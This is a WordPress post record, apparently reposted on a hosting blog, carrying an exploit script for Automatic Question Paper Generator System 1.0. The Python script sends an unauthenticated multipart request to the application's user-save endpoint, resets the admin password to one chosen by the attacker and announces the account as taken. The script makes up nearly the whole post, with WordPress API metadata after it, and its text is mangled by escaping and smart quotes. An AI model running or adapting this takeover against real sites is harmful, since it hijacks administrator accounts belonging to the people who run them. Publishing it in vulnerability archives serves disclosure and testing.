# Exploit Title: Automatic Question Paper Generator System 1.0 – Authentication Bypass
\n# Date: 2022-04-03
\n# Exploit Author: Mr Empy
\n# Software Link: https:\/\/www.sourcecodester.com\/php\/15190\/automatic-question-paper-generator-system-phpoop-free-source-code.html
\n# Version: 1.0
\n# Tested on: Linux
\n#!\/usr\/bin\/env python3
\nimport requests
\nimport random
\nimport string
\nfrom requests_toolbelt import MultipartEncoder
\nfrom time import sleep
\nimport argparse<\/p>\n
def banner():
\nprint(”’
\n___ ____ ____ ______
\n\/ | \/ __ \\ \/ __ \\\/ ____\/
\n\/ \/| |\/ \/ \/ \/ \/ \/_\/ \/ \/ __
\n\/ ___ \/ \/_\/ \/ \/ ____\/ \/_\/ \/
\n\/_\/ |_\\___\\_\\\/_\/ \\____\/<\/p>\n
[Automatic Question Paper Generator v1.0]\n[Authentication Bypass]\n”’)<\/p>\n
def main():
\nfields = {
\n‘id’: “1”,
\n‘firstname’: ‘Adminstrator’,
\n‘lastname’: ‘Admin’,
\n‘username’: ‘admin’,
\n‘password’: arguments.newpassword
\n}<\/p>\n
boundary = ‘—-WebKitFormBoundary’ +
\n”.join(random.sample(string.ascii_letters + string.digits, 16))
\nm = MultipartEncoder(fields=fields, boundary=boundary)<\/p>\n
headers = {
\n“Connection”: “keep-alive”,
\n“Content-Type”: m.content_type
\n}<\/p>\n
r = requests.post(f'{arguments.url}\/classes\/Users.php?f=save’,
\nheaders=headers, data=m)
\nif ‘1’ in r.text:
\nprint(f'[+] Account taken successfully! Login:
\nadmin:{arguments.newpassword}’)
\nelse:
\nprint(‘[-] Not vulnerable’)<\/p>\n
if __name__ == ‘__main__’:
\nparser = argparse.ArgumentParser()
\nparser.add_argument(‘-u’,’–url’, action=’store’, help=’Target URL (
\nhttp:\/\/target.com\/aqpg\/)’, dest=’url’, required=True)
\nparser.add_argument(‘-p’,’–password’, action=’store’, help=’New
\npassword’, dest=’newpassword’, required=True)
\narguments = parser.parse_args()
\nbanner()
\nsleep(2)
\nmain()<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: Automatic Question Paper Generator System 1.0 – Authentication Bypass # Date: 2022-04-03 # Exploit Author: Mr Empy # Software Link: https:\/\/www.sourcecodester.com\/php\/15190\/automatic-question-paper-generator-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Linux #!\/usr\/bin\/env python3 import requests import random import string from requests_toolbelt import MultipartEncoder from time import sleep import argparse def banner(): print(”’ ___ ____ ____ …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21729","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21729","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21729"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21729\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21729"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21729"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21729"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}